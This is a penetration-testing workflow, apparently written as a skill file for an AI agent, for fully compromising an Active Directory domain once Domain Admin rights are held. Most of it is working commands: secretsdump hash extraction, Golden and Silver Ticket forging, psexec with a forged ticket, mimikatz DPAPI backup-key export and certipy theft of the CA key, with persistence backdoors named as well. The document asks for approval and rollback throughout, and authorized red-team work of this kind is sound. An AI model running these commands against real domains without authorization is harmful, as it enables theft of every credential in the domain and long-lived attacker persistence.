Workflow: Domain Dominance
You hold Domain Admin (or equivalent replication rights). Objective: demonstrate full-domain compromise, acquire persistence primitives for report evidence, then roll back any destructive changes.
CRITICAL: Every step below has domain-wide blast radius. Require explicit written approval for each sub-step the customer has opted into. When in doubt, STOP and ask.
Preconditions
- Credentials with DCSync rights OR DA / EA membership
- Change-management window agreed (tickets forged, krbtgt touched)
- Defender/IR team notified (if engagement ROE requires it)
Step 1. Full NTDS extraction (one-shot, documented)
# Preferred: targeted, minimal replication traffic
secretsdump.py corp.local/da_user:pass@dc.corp.local -just-dc-user krbtgt \
> loot/krbtgt.txt
# Full domain hash dump — only if explicitly authorized
secretsdump.py corp.local/da_user:pass@dc.corp.local -just-dc-ntlm \
-outputfile loot/ntdsRecord start/end timestamps for customer IR reconciliation.
Step 2. Golden Ticket (forge arbitrary TGT)
Needs: krbtgt NT hash, domain SID, domain name.
# Get domain SID
lookupsid.py corp.local/da_user:pass@dc.corp.local 0 | grep 'Domain SID'
# Forge with Impacket
ticketer.py -nthash <KRBTGT_NT> -domain-sid S-1-5-21-... -domain corp.local \
Administrator
export KRB5CCNAME=$(pwd)/Administrator.ccache
psexec.py -k -no-pass corp.local/Administrator@dc.corp.localUse a time-boxed lifetime (-duration 10) for engagement tickets — don't forge 10-year tickets on production.
Step 3. Silver Ticket (service-scoped, stealthier)
Needs: service account NT hash, domain SID, SPN.
ticketer.py -nthash <SVC_NT> -domain-sid S-1-5-21-... -domain corp.local \
-spn cifs/sql01.corp.local AdministratorNo DC traffic at all — does not touch krbtgt.
Step 4. DPAPI backup key (domain-wide secret decryption)
# Extract the DPAPI domain backup key (one-time operation per domain)
secretsdump.py corp.local/da_user:pass@dc.corp.local \
-just-dc-user 'BUILTIN\DPAPI_BACKUP' 2>/dev/null
# Or via mimikatz
mimikatz.exe "lsadump::backupkeys /system:dc.corp.local /export"Enables offline decryption of every user's DPAPI-protected secrets (Chrome/Edge saved passwords, RDP creds, Wi-Fi keys).
Step 5. ADCS CA compromise (if ADCS in scope)
# Dump CA cert + private key (for persistence via "Golden Certificate")
certipy-ad ca -u da@corp.local -p pass -target ca.corp.local \
-backup -dc-ip $DC_IPStep 6. Evidence capture (before rollback)
For each dominance primitive, record evidence into loot/dominance/:
| Primitive | Evidence file |
|---|---|
| NTDS extraction | ntds.ntds + timestamp |
| Golden Ticket | Administrator.ccache + forge command log |
| DPAPI backup | ntds_$BUILTIN_dpapi.txt |
| CA key | ca_key.pfx + thumbprint |
Screenshots: whoami /all under the forged context, Get-ADDomain output from the DA session.
Step 7. Rollback / cleanup (mandatory)
Anything modified or implanted must be reverted before engagement close:
| Change | Rollback |
|---|---|
| Added ACL ACE | dacledit.py remove, confirm via re-enum |
| Added group member | net rpc group delmem ... |
| krbtgt password reset (if used) | Requires customer — reset krbtgt TWICE, 10h apart |
| Implanted AdminSDHolder ACE | dacledit.py remove |
| Computer account created (MAQ) | addcomputer.py -action delete |
| Scheduled task / service | schtasks /delete, sc delete |
| Forged tickets | Time-boxed (they expire); do not re-issue |
CRITICAL: krbtgt must be reset TWICE with a gap >= the longest service ticket lifetime (default 10 hours). A single reset still accepts old golden tickets.
Step 8. Do NOT do (without explicit, separate approval)
- Skeleton Key (
misc::skeleton) on production DC — this is long-term persistence that survives reboot-until-mimikatz-unloaded but is detectable and invasive. - AdminSDHolder backdoor ACEs left in place.
- DSRM admin account password sync + remote logon enablement.
- krbtgt password reset without customer — can break services.
- Full
-just-dcagainst primary DC during business hours (replication storm).
Reasoning budget guidance
- Step 6 evidence curation and Step 7 rollback ordering benefit from extended thinking — the ordering matters (e.g., remove scheduled task from host BEFORE removing the ACL that let you add it, or you lock yourself out of cleanup).
Multimodal hook
- Capture a screenshot of an authoritative command under DA context (e.g.,
Get-ADDomain,nltest /dclist:corp.local). Link fromschemas/finding.json#evidence.screenshot.
End of engagement
Produce the report using the structure in the main SKILL.md reporting notes, cross-reference each finding with the attack_chain field in schemas/finding.json.